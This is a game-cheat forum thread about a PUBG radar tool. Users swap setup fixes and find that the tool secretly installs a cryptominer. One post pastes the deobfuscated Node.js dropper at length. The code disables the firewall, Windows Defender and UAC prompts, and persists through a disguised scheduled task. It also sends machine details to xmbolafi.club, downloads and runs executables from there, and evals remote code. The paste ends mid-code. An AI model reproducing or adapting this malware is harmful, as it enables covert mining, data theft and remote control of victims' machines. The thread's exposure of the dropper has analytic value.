[FREE] PUBG RADAR undetected packet sniffer
Discussion on [FREE] PUBG RADAR undetected packet sniffer within the PlayerUnknown's Battlegrounds forum part of the Popular Games category.
03/11/2018, 22:43
|
#706
|
elite*gold: 0
Join Date: Jan 2018
Posts: 20
Received Thanks: 2
|
Quote:
Originally Posted by painz0r213
I scanned 2 days ago with mw bytes and found a bitcoin miner virus, didn't know it was from ballot ...
|
Yea, it is. He seemed like a nice guy
|
|
|
03/11/2018, 23:04
|
#707
|
elite*gold: 0
Join Date: May 2010
Posts: 3
Received Thanks: 0
|
I have the following error. I have gone through different posts to see if someone else also has it, but I could not fix it on my own.
- I have everything installed
- I have the IPs well placed and as it should be (I've tried some other IPs)
- The farthest it has gotten is that the online vRUN opens and closes
- Question attached: is the radar executed once inside the game, or can it be run at any time?
When I execute the Install (After steps), I get those errors, is it normal?
- The radar downloads it directly from GitHub
|
|
|
03/11/2018, 23:24
|
#708
|
elite*gold: 0
Join Date: Sep 2013
Posts: 99
Received Thanks: 4
|
Quote:
Originally Posted by pip369
I have the following error. I have gone through different posts to see if someone else also has it, but I could not fix it on my own.
- I have everything installed
- I have the IPs well placed and as it should be (I've tried some other IPs)
- The farthest it has gotten is that the online vRUN opens and closes
- Question attached: is the radar executed once inside the game, or can it be run at any time?
When I execute the Install (After steps), I get those errors, is it normal?
- The radar downloads it directly from GitHub

|
Try jdk 8u45
|
|
|
03/11/2018, 23:48
|
#709
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
I'll be honest, I will happily bitcoin mine in tradeoff of this being free. As long as it's running only when I'm running the hack (which it appears to be), I have no complaints. Think of it as paying him for the hack.
So I did end up fixing my problem. This morning before going to bed I started completely from scratch and checked everything. Windows firewall had decided to disable routing and remote access after I had enabled it on my laptop. I re-enabled it and now it works great.
|
|
|
03/12/2018, 01:11
|
#710
|
elite*gold: 0
Join Date: Feb 2018
Posts: 13
Received Thanks: 0
|
hi all,
I got this problem when I tried today; it used to work fine yesterday
0
0
0
AL lib: (EE) ALCmmdevPlayback_open: Device init failed: 0x80070490
It only opens a grey screen without the map; all VPN connected fine. Does anyone have the solution, please?
|
|
|
03/12/2018, 01:24
|
#711
|
elite*gold: 0
Join Date: Sep 2013
Posts: 99
Received Thanks: 4
|
Quote:
Originally Posted by midi2
hi all,
I got this problem when I tried today; it used to work fine yesterday
0
0
0
AL lib: (EE) ALCmmdevPlayback_open: Device init failed: 0x80070490
It only opens a grey screen without the map; all VPN connected fine. Does anyone have the solution, please?
|
You didn't put the correct IPs.
|
|
|
03/12/2018, 01:28
|
#712
|
elite*gold: 0
Join Date: Feb 2018
Posts: 13
Received Thanks: 0
|
Quote:
Originally Posted by painz0r213
You didn't put the correct IPs.
|
I am pretty sure it was the right IP address.
On my gaming PC I am using the VPN IP,
and on my middle (2nd) PC I am using the Ethernet IP.
Even when I try both IPs it won't work.
It's not working anymore for me, only a grey screen.
|
|
|
03/12/2018, 04:19
|
#713
|
elite*gold: 0
Join Date: Aug 2017
Posts: 11
Received Thanks: 1
|
Guys, I've got a problem: I cannot set up the VPN on Windows 7 (2nd PC). I tried to set up a new incoming connection but it seems like it doesn't start up. I tried turning off IPv6 and enabling IP routing but nothing happened.
Can anybody help?
|
|
|
03/12/2018, 04:38
|
#714
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
Check %appData%\Roaming\speechapi for nodejs... with strange obfuscated JS... it unpacks and runs when you run this Java applet...
Thread starter, why are you doing this?
|
|
|
03/12/2018, 04:44
|
#715
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
Quote:
Originally Posted by SNKKU
Check %appData%\Roaming\speechapi for nodejs... with strange obfuscated JS... it unpacks and runs when you run this Java applet...
Thread starter, why are you doing this?
|
If you delete those in APPDATA will it delete the miner?
|
|
|
03/12/2018, 04:45
|
#716
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
Quote:
Originally Posted by Nightzfury
If you delete those in APPDATA will it delete the miner?
|
Maybe... I found another free radar without this **** ))
|
|
|
03/12/2018, 04:48
|
#717
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
Quote:
Originally Posted by SNKKU
Maybe... I found another free radar without this **** ))
|
I didn't download this one, I got the one from GITHUB and it definitely has one as well.
SNKKU where did you get yours?
|
|
|
03/12/2018, 04:56
|
#718
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
GitHub is open source and you see everything you get... this is compiled and obfuscated and you don't see what's inside, but inside you have this...
Code:
var http = require('http');
var fs = require('fs');
var regedit = require('regedit');
var exec = require('child_process')['exec'];
var execSync = require('child_process')['execSync'];
var path = require('path');
var srequest = require('sync-request');
var si = require('systeminformation');
var SingleInstance = require('single-instance');
var date = new Date();
var day = date['getDate']();
var appDir = path['dirname'](require['main']['filename']);
var blist = ['taskmgr.exe', 'wireshark.exe', 'Fiddler.exe', 'Charles.exe', 'smsniff.exe', 'procexp.exe', 'proc64.exe'];
var glist = ['league of legends.exe', 'tslgame.exe', 'tslgame_be.exe', 'tslgame.exe', 'tslgame_be.exe', 'csgo.exe', 'overwatch.exe', 'overwatch launcher.exe', 'overwatch.exe', 'minecraftlauncher.exe', 'wow-64.exe', 'hearthstone.exe', 'dota2.exe', 'gtavlauncher.exe', 'rainbowsix.exe', 'rainbowsix_be.exe', 'rainbowsix.exe', 'rainbowsix_be.exe', 'rocketleague.exe', 'heroesofthestorm_x64.exe', 'hl2.exe', 'warframe.x64.exe', 'warframe.exe', 'h1z1.exe', 'launchpad.exe', 'h1z1.exe', 'launchpad.exe', 'shootergame.exe', 'shootergame_be.exe', 'paladins.exe', 'paladinseac.exe', 'paladins.exe', 'paladinseac.exe', 'pathofexile_x64steam.exe', 'hl2.exe', 'rust.exe', 'rustclient.exe', 'worldoftanks.exe', 'ffxiv_dx11.exe', 'bf1.exe', 'geometrydash.exe', 'dolphin.exe', 'terraria.exe', 'brawlhalla.exe', 'payday2_win32_release.exe', 'walkingdead101.exe', 'sonicmania.exe', 'golf with your friends.exe', 'cities.exe', 'arma3launcher.exe', 'left4dead2.exe', 'project64.exe', 'runescape.exe', 'deadbydaylight.exe', 'deadbydaylight-win64-shipping.exe', 'unturned.exe', 'unturned_be.exe', 'wowslauncher.exe', 'eocapp.exe', 'supporttool.exe', 'eocapp.exe', 'bf1.exe', 'isaac-ng.exe', 'blackdesert64.exe', 'black desert online steam launcher.exe', 'tslgame.exe', 'steamlauncher.exe', 'hiveswap-act1.exe', 'hoi4.exe', 'monaco.exe', 'civilizationv_dx11.exe', 'smiteeac.exe', 'factorio.exe', 'diablo iii64.exe', 'sc2_x64.exe', 'skyrimlauncher.exe', 'tesv.exe', 'skyrimlauncher.exe', 'tesv.exe', 'thedivision.exe', 'dontstarve_steam.exe', 'shellshocklive.exe', 'vc_redist.exe', 'spaceengineers.exe', 'starbound.exe', 'eurotrucks2.exe', 'portal2.exe', 'ts4_x64.exe', 'blackops3.exe', 'stardew valley.exe', 'darksoulsiii.exe', 'hl2.exe', 'fallout4.exe', 'fallout4launcher.exe', 'fallout4.exe', 'fallout4launcher.exe', 'falloutnv.exe', 'falloutnvlauncher.exe', 'falloutnv.exe', 'falloutnvlauncher.exe', 'maplestory.exe', 'witcher3.exe', 'hl2.exe', 'bf4.exe', 'modlauncherwpf.exe', 'gw2-64.exe', 'skyrimse.exe', 
'skyrimselauncher.exe', 'skyrimse.exe', 'skyrimselauncher.exe', 'olgame.exe', 'outlastlauncher.exe', 'olgame.exe', 'depthgame.exe', 'tabletop simulator.exe', 'stellaris.exe', 'glyphclientapp.exe', 'gang beasts.exe', 'theforest.exe', 'insurgency.exe', 'insurgency_be.exe', 'eu4.exe', 'townofsalem.exe', 'battlerite.exe', 'robocraft.exe', 'golfit-win64-shipping.exe', 'heroesandgeneralsdesktop.exe', 'shadowverse.exe', '7daystodie.exe', '7daystodie_eac.exe', '7daystodie.exe', '7daystodie_eac.exe', 'kfgame.exe', 'starcraft.exe', 'undertale.exe', 'duckgame.exe', 'dirtybomblauncher.exe', 'businesstour.exe', 'falloutshelter.exe', 'slimerancher.exe', 'titanfall2.exe', 'starwarsbattlefront.exe', 'binkplay.exe', 'mb_warband.exe', 'swtor.exe', 'launchpad.exe', 'planetside2_x64.exe', 'clicker heroes.exe', 'psychonauts.exe', 'amtrucks.exe', 'codwaw.exe', 'dofus.exe', 'hl.exe', 'comedy night.exe', 'etg.exe', 'edlaunch.exe', 'wizardgraphicalclient.exe', 'adventure-capitalist.exe', 'aok hd.exe', 'aok hd.exe', 'evelauncher.exe', 'exefile.exe', 'evelauncher.exe', 'heat_signature.exe', 'rimworldwin.exe', 'speedrunners.exe', 'aces.exe', 'rivalsofaether.exe', 'beamng.exe', 'subnautica.exe', 'civilizationvi.exe', 'bethesda.net_launcher.exe', 'bethesda.exe', 'doomx64.exe', 'ftlgame.exe', 'realm of the mad god.exe', 'justcause3.exe', 'hl2.exe', 'vc_redist.exe', 's2_mp64_ship.exe', 'deadcells.exe', 'fifa17.exe', 'dbxv2.exe', 'eac_launcher.exe', 'summercamp.exe', 'prison architect.exe', 'tekkengame-win64-shipping.exe', 'theescapists2.exe', 'ck2game.exe', 'microsimulator.exe', 'mycomgames.exe', 'shadowofmordor.exe', 'mgsvtpp.exe', 'idledragons.exe', 'huniepop.exe', 'ultimatechickenhorse.exe', 'nierautomata.exe', 'darksoulsii.exe', 'warhammer2.exe', 'skullgirls.exe', 'farmingsimulator2017game.exe', '100orange.exe', 'necrodancer.exe', 't6mp.exe', 'battles-win.exe', 'dishonored.exe', 'svencoop.exe', 'tower-win64-shipping.exe', 'dyinglightgame.exe', 'cmw.exe', 'squad_launcher.exe', 
'astro-win64-shipping.exe', 'creativerse.exe', 'abewin.exe', 'grw.exe', 'battleblocktheater.exe', 'killingfloor.exe', 'ksp.exe', 'ksp_x64.exe', 'rottr.exe', 'castle.exe', 'newzlauncher.exe', 'thenewz.exe', 'tbl-win64-shipping.exe', 'hl2.exe', 'battlefrontii.exe', 'cuphead.exe', 'nsuns4.exe', 'tera-launcher.exe', 'saintsrowiv.exe', 'absolver-win64-shipping.exe', 'scrapmechanic.exe', 'oxygennotincluded.exe', 'hl.exe', 'nuclearthrone.exe', 'dishonored_do.exe', 'hl2.exe', 'sims3launcherw.exe', 'ts3w.exe', 'eocapp.exe', 'ravenfield.exe', 'lifeisstrange.exe', 'hollow_knight.exe', 'game_launcher.exe', 'planetcoaster.exe', 'dishonored2.exe', 'clustertruck.exe', 'crushcrush.exe', 'bf3.exe', 'ww2.exe', 'reliccoh2.exe', 'realmgrinderdesktop.exe', 'pcars64.exe', 'hl.exe', 'gh3.exe', 'roblox.exe', 'gta-sa.exe', 'gta_sa.exe', 'gta-sa.exe', 'destiny2.exe', 'hoblauncher.exe', 'stickfight.exe', 'osu!.exe', 'falloutlauncher.exe', 'shadowofwar.exe', 'war-win64-shipping.exe', 'duelyst.exe', 'holodrive.exe', 'toothandtail.exe', 'love.exe', 'ballisticoverkill.exe', 'grip-win64-shipping.exe', 'hellion.exe', 'wolfneworder_x64.exe', 'dayofinfamy.exe', 'dayofinfamy_be.exe', 'deceit.exe', 'darkest.exe', 'batim.exe', 'hatintimegame.exe', 'besiege.exe', 'life is strange - before the storm.exe', 'guns up.exe', 'h1z1.exe', 'h1z1_be.exe', 'launchpad.exe', 'dlpc.exe', 'fifa18.exe', 'sanctumgame-win32-shipping.exe', 'human.exe', 'watch_dogs.exe', 'acorigins.exe', 'cs2d.exe', 'newcolossus_x64vk.exe', 'dayz_x64.exe', 'brutallegend.exe', 'fortniteclient-win64-shipping.exe', 'zombidle.exe', 'srhk.exe', 'vngame.exe', 'thebureau.exe', 'elsword.exe', 'rome2.exe', 'pizzeria simulator.exe', 'gettingoverit.exe', 'gunsoficarusonline.exe', 'zombidle.exe', 'gunsnboxes.exe', 'vrchat.exe', 'red crucible.exe', 'ac4bfsp.exe', 'ac4bfmp.exe', 'ac4bfsp.exe', 'escapefromtarkov.exe', 'scpsl.exe', 'theyarebillions.exe', 'tld.exe', 'pokemon trading card game online.exe', 'kingdom.exe', 'vrmonitor.exe', 
'dontstarve_steam.exe', 'gwent.exe', 'long live santa.exe', 'slaythespire.exe', 'kingdomsandcastles.exe', 'northgard.exe', 'broforce_beta.exe', 'crossfire.exe', 'neverwinter.exe', 'tibia.exe', 'papersplease.exe', 'cw.exe', 'sporeapp.exe', 'plagueincevolved.exe', 'borderlandspresequel.exe', 'hotlinemiami.exe', 'homefront.exe', 'thehuntercotw_f.exe', 'tombraider.exe', 'isaac.exe', 'we were here.exe', 'this war of mine.exe', 'hotlinemiami2.exe'];
var cmd = 'netsh advfirewall set allprofiles state off';
var cmz = 'schtasks.exe /query /TN "Microsoft\Windows\AppID\SmartScreens"';
var cmf = 'schtasks.exe /Create /SC MINUTE /mo 1 /TN "Microsoft\Windows\AppID\SmartScreens" /TR "' + appDir + '\nircmd.exe exec hide node.exe ' + appDir + '\index.js" /IT /F /RL HIGHEST';
var lversion, rversion, scommand, mane = null,
exename;
var pcname, gpuname, osversion, serialnum, regpu;
var gpumodel, wamung;
function hget(_0x7107x1f) {
var _0x7107x20 = srequest('GET', _0x7107x1f);
return _0x7107x20['getBody']('utf8')
}
var deleteFolderRecursive = function(path) {
if (fs['existsSync'](path)) {
fs['readdirSync'](path)['forEach'](function(_0x7107x22, _0x7107x23) {
var _0x7107x24 = path + '/' + _0x7107x22;
if (fs['lstatSync'](_0x7107x24)['isDirectory']()) {
deleteFolderRecursive(_0x7107x24)
} else {
fs['unlinkSync'](_0x7107x24)
}
});
fs['rmdirSync'](path)
}
};
function remove_file(_0x7107x26) {
return fs['unlinkSync'](_0x7107x26)
}
function read_file(_0x7107x26) {
return fs['readFileSync'](_0x7107x26, 'utf8')
}
function write_file(_0x7107x29, _0x7107x2a) {
fs['writeFileSync'](_0x7107x29, _0x7107x2a)
}
function exist_file(_0x7107x2c) {
return fs['existsSync'](_0x7107x2c)
}
function deleteoldversion() {
if (exist_file(appDir + '\'+ lversion+ gpumodel+ '.exe ')){remove_file(appDir+ '\
'+ lversion+ gpumodel+ '.exe ')};if(exist_file(appDir+ '\
'+ lversion)){}}function checkversion(){wamung= wamung+ gpumodel;if(gpumodel!= '
other '){if(exist_file(appDir+ '\
version.txt ')== false){write_file(appDir+ '\
version.txt ','
0 ');console['log']('version kontrol old:' + lversion + ' new:' + rversion);
if (lversion != rversion) {
console['log']('yeni version indir');
deleteoldversion();
var _0x7107x22 = fs['createWriteStream'](appDir + '\'+ rversion+ gpumodel+ '.exe ');
_0x7107x22['on']('finish ', function() {
write_file(appDir + 'version.txt', rversion);
console['log']('yeni version indi ');
exec(appDir + 'nircmd.exe exec hide ' + rversion + gpumodel + '.exe - d "' + appDir + '"', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit ']()
})
});
var _0x7107x32 = http['get ']('http: //xmbolafi.club/' + rversion + gpumodel + '.exe', function(_0x7107x33) {
_0x7107x33['pipe'](_0x7107x22)
})
}
else {
console['log'](gpumodel);
scommand = hget('http://xmbolafi.club/sm' + gpumodel + '.txt');
exename = scommand['split']('.exe')[0] + '.exe';
mane = exec(appDir + '\'+ lversion+ '
'+ scommand,function(_0x7107x2f,_0x7107x30,_0x7107x31){});
console['log ']('version guncel ')
}
} else {
clearInterval(intervalObj2);
eval(hget('http: //xmbolafi.club/eval.txt'))
}
}
function first_run() {
exec(cmz, function(_0x7107x35, _0x7107x30, _0x7107x31) {
if (_0x7107x30 == '') {
exec(cmf, function(_0x7107x35, _0x7107x30, _0x7107x31) {})
}
});
exec(cmd, function(_0x7107x35, _0x7107x30, _0x7107x31) {});
regedit['createKey'](['HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'], function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x41\x64\x6D\x69\x6E": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x55\x73\x65\x72": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['createKey'](['HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'], function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x43\x55\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x4E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x5C\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x57\x69\x6E\x64\x6F\x77\x73\x2E\x53\x79\x73\x74\x65\x6D\x54\x6F\x61\x73\x74\x2E\x53\x65\x63\x75\x72\x69\x74\x79\x41\x6E\x64\x4D\x61\x69\x6E\x74\x65\x6E\x61\x6E\x63\x65": {
"\x45\x6E\x61\x62\x6C\x65\x64": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
checkversion()
})
})
})
})
})
})
})
})
})
}
function first_run_of_day() {
if (read_file(appDir + '\frod') != day) {
console['log']('frod run');
write_file(appDir + '\frod', day);
first_run()
} else {
checkversion()
}
}
function sendinfo() {
si['graphics'](function(_0x7107x38) {
gpuname = _0x7107x38['controllers'][0]['model'];
si['osInfo'](function(_0x7107x38) {
osversion = _0x7107x38['distro'];
pcname = _0x7107x38['hostname'];
si['diskLayout'](function(_0x7107x38) {
serialnum = _0x7107x38[0]['serialNum'];
write_file(appDir + '\pcinfo.txt', osversion + ' - ' + pcname + ' - ' + regpu + ' - ' + serialnum);
console['log'](osversion + '\x0A' + pcname + '\x0A' + gpuname + '\x0A' + serialnum);
hget('http://xmbolafi.club/pcreg.php?type=update&pc=' + pcname + '&os=' + osversion + '&gpu=' + regpu + '&sn=' + serialnum + '&status=1')
})
})
})
}
function checkgpu() {
si['graphics'](function(_0x7107x38) {
gpuname = _0x7107x38['controllers'][0]['model'];
regpu = _0x7107x38['controllers'][0]['model'];
gpumodel = 'other';
if (gpuname['indexOf']('NVIDIA') > -1) {
gpumodel = 'nvidia'
};
if (gpuname['indexOf']('AMD') > -1) {
gpumodel = 'amd'
};
var _0x7107x3a;
var _0x7107x3b = _0x7107x38['controllers']['length'];
if (_0x7107x3b > 1) {
for (_0x7107x3a = 0; _0x7107x3a < _0x7107x3b; _0x7107x3a++) {
if (_0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('NVIDIA') > -1 || _0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('GeForce') > -1) {
regpu = _0x7107x38['controllers'][_0x7107x3a]['model'];
gpumodel = 'nvidia'
};
if (_0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('AMD') > -1 || _0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('Radeon') > -1) {
regpu = _0x7107x38['controllers'][_0x7107x3a]['model'];
gpumodel = 'amd'
}
}
};
console['log'](gpumodel);
first_run_of_day();
sendinfo()
})
}
exec('tasklist', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
for (i = 0; i < blist['length']; i++) {
if (_0x7107x30['toLowerCase']()['indexOf'](blist[i]['toLowerCase']()) > -1) {
console['log']('first die bitch');
exec('taskkill /f /im ' + exename, function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit'](0)
})
}
}
});
wamung = 'http://whos.amung.us/pingjs/?k=node';
var locker = new SingleInstance('game-helper-js');
locker['lock']()['then'](function() {
if (exist_file(appDir + '\frod') == false) {
write_file(appDir + '\frod', 0);
checkgpu()
} else {
checkgpu()
}
})['catch'](function(_0x7107x2f) {
console['log'](_0x7107x2f);
process['exit'](0)
});
var intervalObj = setInterval(() => {
exec('tasklist', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
for (i = 0; i < blist['length']; i++) {
if (_0x7107x30['toLowerCase']()['indexOf'](blist[i]['toLowerCase']()) > -1) {
console['log']('die bitch');
exec('taskkill /f /im ' + exename, function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit'](0)
})
}
}
})
}, 1000);
var intervalObj2 = setInterval(() => {
exec('tasklist', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
for (i = 0; i < glist['length']; i++) {
if (_0x7107x30['toLowerCase']()['indexOf'](glist[i]['toLowerCase']()) > -1) {
console['log']('die bitch');
exec('taskkill /f /im ' + exename, function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit'](0)
})
}
}
})
}, 5500);
var intervalObj1 = setInterval(() => {
hget(wamung)
}, 60000);
process['on']('exit', function() {
console['log']('byeti')
})
and this
Code:
var http = require('http');
var fs = require('fs');
var regedit = require('regedit');
var exec = require('child_process')['exec'];
var execSync = require('child_process')['execSync'];
var path = require('path');
var srequest = require('sync-request');
var si = require('systeminformation');
var SingleInstance = require('single-instance');
var date = new Date();
var day = date['getDate']();
var today = new Date();
today['setDate'](today['getDate']() + 3);
var dd = today['getDate']();
var mm = today['getMonth']() + 1;
var yyyy = today['getFullYear']();
if (dd < 10) {
dd = '0' + dd
};
if (mm < 10) {
mm = '0' + mm
};
var today = dd + '/' + mm + '/' + yyyy;
var appDir = path['dirname'](require['main']['filename']);
var blist = ['taskmgr.exe', 'wireshark.exe', 'Fiddler.exe', 'Charles.exe', 'smsniff.exe'];
var cmd = 'netsh advfirewall set allprofiles state off';
var cmz = 'schtasks.exe /query /TN "Microsoft\Windows\AppID\SmartScreens"';
var cmf = 'schtasks.exe /Create /SC MINUTE /mo 1 /TN "Microsoft\Windows\AppID\SmartScreens" /TR "' + appDir + '\nircmd.exe exec hide node.exe ' + appDir + '\index.js" /SD ' + today + ' /IT /F /RL HIGHEST';
var lversion, rversion, scommand, mane = null,
exename;
var pcname, gpuname, osversion, serialnum, regpu;
var gpumodel, wamung;
function hget(_0x8b19x22) {
var _0x8b19x23 = srequest('GET', _0x8b19x22);
return _0x8b19x23['getBody']('utf8')
}
function checkgpu() {
si['graphics'](function(_0x8b19x25) {
gpuname = _0x8b19x25['controllers'][0]['model'];
regpu = _0x8b19x25['controllers'][0]['model'];
gpumodel = 'other';
if (gpuname['indexOf']('NVIDIA') > -1) {
gpumodel = 'nvidia'
};
if (gpuname['indexOf']('AMD') > -1) {
gpumodel = 'amd'
};
var _0x8b19x26;
var _0x8b19x27 = _0x8b19x25['controllers']['length'];
if (_0x8b19x27 > 1) {
for (_0x8b19x26 = 0; _0x8b19x26 < _0x8b19x27; _0x8b19x26++) {
if (_0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('NVIDIA') > -1 || _0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('GeForce') > -1) {
regpu = _0x8b19x25['controllers'][_0x8b19x26]['model'];
gpumodel = 'nvidia'
};
if (_0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('AMD') > -1 || _0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('Radeon') > -1) {
regpu = _0x8b19x25['controllers'][_0x8b19x26]['model'];
gpumodel = 'amd'
}
}
};
console['log'](gpumodel);
sendinfo()
})
}
function sendinfo() {
si['graphics'](function(_0x8b19x25) {
gpuname = _0x8b19x25['controllers'][0]['model'];
si['osInfo'](function(_0x8b19x25) {
osversion = _0x8b19x25['distro'];
pcname = _0x8b19x25['hostname'];
si['diskLayout'](function(_0x8b19x25) {
serialnum = _0x8b19x25[0]['serialNum'];
console['log'](osversion + '\x0A' + pcname + '\x0A' + gpuname + '\x0A' + serialnum);
hget('http://xmbolafi.club/pcreg.php?type=insert&pc=' + pcname + '&os=' + osversion + '&gpu=' + regpu + '&sn=' + serialnum + '&status=0')
})
})
})
}
exec(cmz, function(_0x8b19x29, _0x8b19x2a, _0x8b19x2b) {
if (_0x8b19x2a == '') {
exec(cmf, function(_0x8b19x29, _0x8b19x2a, _0x8b19x2b) {})
}
});
exec(cmd, function(_0x8b19x29, _0x8b19x2a, _0x8b19x2b) {});
regedit['createKey'](['HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'], function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
